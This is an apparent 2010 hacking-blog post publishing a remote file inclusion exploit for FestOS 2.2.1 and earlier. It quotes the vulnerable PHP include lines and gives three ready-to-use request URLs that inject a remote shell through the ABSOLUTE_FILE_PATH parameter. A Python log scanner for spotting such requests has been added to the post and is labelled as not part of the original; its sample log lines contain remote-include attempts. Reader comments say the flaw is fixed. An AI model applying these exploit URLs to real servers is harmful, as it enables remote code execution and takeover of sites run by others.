FestOs <= 2.2.1 Multiple RFI Exploit
January 11, 2010, 11:21 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
~ Code : [reports_placement.php]
<?php
$title = "Jury Sheet Report";
// $config is never assigned in this script before it is used to build the include path
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
    header("Location:index.php");
}
include "includes/reportheader.php";
?>
~ 3xplo!t :
[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [FestOS.php]
require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");
~ 3xplo!t :
[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [reportheader.php]
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
~ 3xplo!t :
[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]
and more...
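A log check for the requests shown above, as an added example that is not part of the original post or of the FestOS code: it scans web-server access-log lines for requests that put a remote URL into the ABSOLUTE_FILE_PATH parameter and reports the script and response status for triage. The Apache combined log format, the sample lines and addresses, and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined-log style (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2010:10:00:00 +0000] '
    '"GET /festos/index.php?view=events HTTP/1.1" 200 4312',
    '203.0.113.9 - - [12/Jan/2010:10:02:11 +0000] '
    '"GET /festos/admin/reports_placement.php?ABSOLUTE_FILE_PATH=http://198.51.100.7/s.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Jan/2010:10:02:12 +0000] '
    '"GET /festos/core/FestOS.php?ABSOLUTE_FILE_PATH=http%3A%2F%2F198.51.100.7%2Fs.txt HTTP/1.1" 404 210',
    '192.0.2.44 - - [12/Jan/2010:10:05:40 +0000] '
    '"GET /festos/login.php?return=http://festival.example/ HTTP/1.1" 200 900',
]

# client, identd, user, [timestamp], "METHOD target PROTOCOL", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# An include-path value that starts with a URL scheme instead of a local path.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)


def find_rfi_attempts(lines, param="ABSOLUTE_FILE_PATH"):
    """Return one dict per request that puts a remote URL into `param`."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values, so an encoded URL
        # is compared in clear form.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if param.lower() in name.lower() and REMOTE_RE.match(value):
                hits.append({"client": client, "script": parts.path,
                             "value": value, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the targeted script exists on the server and should be reviewed first; a 404 indicates a probe against a path that is not present.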
2 Comments
Fixed in newest version.
Comment by Skypanther January 12, 2010 @ 2:45 pm
What is the latest version now?
Comment by admin January 13, 2010 @ 10:45 am